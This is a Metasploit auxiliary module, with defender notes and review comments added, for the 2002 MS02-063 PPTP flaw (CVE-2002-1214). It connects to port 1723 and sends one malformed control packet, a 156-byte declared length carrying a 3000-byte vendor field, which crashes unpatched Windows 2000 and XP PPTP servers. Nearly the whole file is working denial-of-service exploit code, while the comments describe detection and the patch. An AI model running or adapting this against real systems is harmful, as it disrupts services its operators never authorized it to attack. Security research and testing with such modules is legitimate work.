##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary denial-of-service module for MS02-063 / CVE-2002-1214.
#
# It opens one TCP connection to RPORT and writes a single PPTP control
# packet; per the 'Description' below, unpatched Windows 2000 SP0-3 and
# XP SP0-1 PPTP RAS servers crash (BSOD) on receipt. Nothing is read back.
#
# Defender notes:
# - The observable anomaly is a Start-Control-Connection-Request whose
#   declared Length field (0x009c = 156) is much smaller than the bytes
#   actually placed on the wire (28 bytes of header fields followed by a
#   3000-byte vendor field, 3028 bytes in total); a PPTP-aware sensor can
#   flag that length/size mismatch on the control port.
# - The fix is the MS02-063 update listed in 'References'; the packet has
#   no effect on a patched server, and the module performs no further
#   action after sending it.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp # provides connect / sock / disconnect
  include Msf::Auxiliary::Dos

  # Registers module metadata and the one option this module adds itself:
  # RPORT, defaulting to 1723 (the PPTP control channel port).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',
      'Description'    => %q{
        This module exploits a kernel based overflow when sending abnormal PPTP Control Data
        packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers
        (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.
        Code execution may be possible however this module is only a DoS.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '5807' ],
          [ 'CVE', '2002-1214' ],
          [ 'OSVDB', '13422' ],
          [ 'MSB', 'MS02-063' ],
        ],
      'DisclosureDate' => '2002-09-26'))

    register_options(
      [
        Opt::RPORT(1723),
      ])
  end

  # Connects to the target, writes the single malformed control packet,
  # reports, and disconnects.
  #
  # NOTE(review): disconnect is not inside an ensure block, so an exception
  # raised by sock.put skips it; the framework's own cleanup may close the
  # socket anyway — confirm before relying on that.
  def run
    connect

    # One PPTP control message built from fixed big-endian byte literals.
    # The wire bytes must stay exactly as written. The first literal is
    # mutated by `<<`, so do not add `# frozen_string_literal: true` to this
    # file without changing it to String.new / .dup (a frozen literal would
    # raise FrozenError here).
    #
    # Fields borrowed from Wireshark :)
    sploit = "\x00\x9c" # length — declares 156 bytes; the packet actually written is 3028 bytes
    sploit << "\x00\x01" # control message
    sploit << "\x1a\x2b\x3c\x4d" # cookie
    sploit << "\x00\x01" # start control connection req
    sploit << "\x00\x00" # reserved
    sploit << "\x01\x00" # protocol version
    sploit << "\x00\x00" # reserved
    sploit << "\x00\x03" # framing capabilities
    sploit << "\x00\x00\x00\x02" # bearer capabilities
    sploit << "\xff\xff" # max channels
    sploit << "\x0a\x28" # firmware revision
    sploit << "\x00\x01" # Hostname
    sploit << "A" * 3000 # Vendor - trigger vuln (oversized field; this is the length/size mismatch noted above)

    print_status("Sending PPTP DoS Packet...")

    # Fire-and-forget: nothing is read from the socket afterwards, so the
    # status line below reports only that the write completed, not that the
    # target was affected.
    sock.put(sploit)

    print_status("Packet sent. Kernel should halt on a Stop Error (BSOD).")

    disconnect
  end
end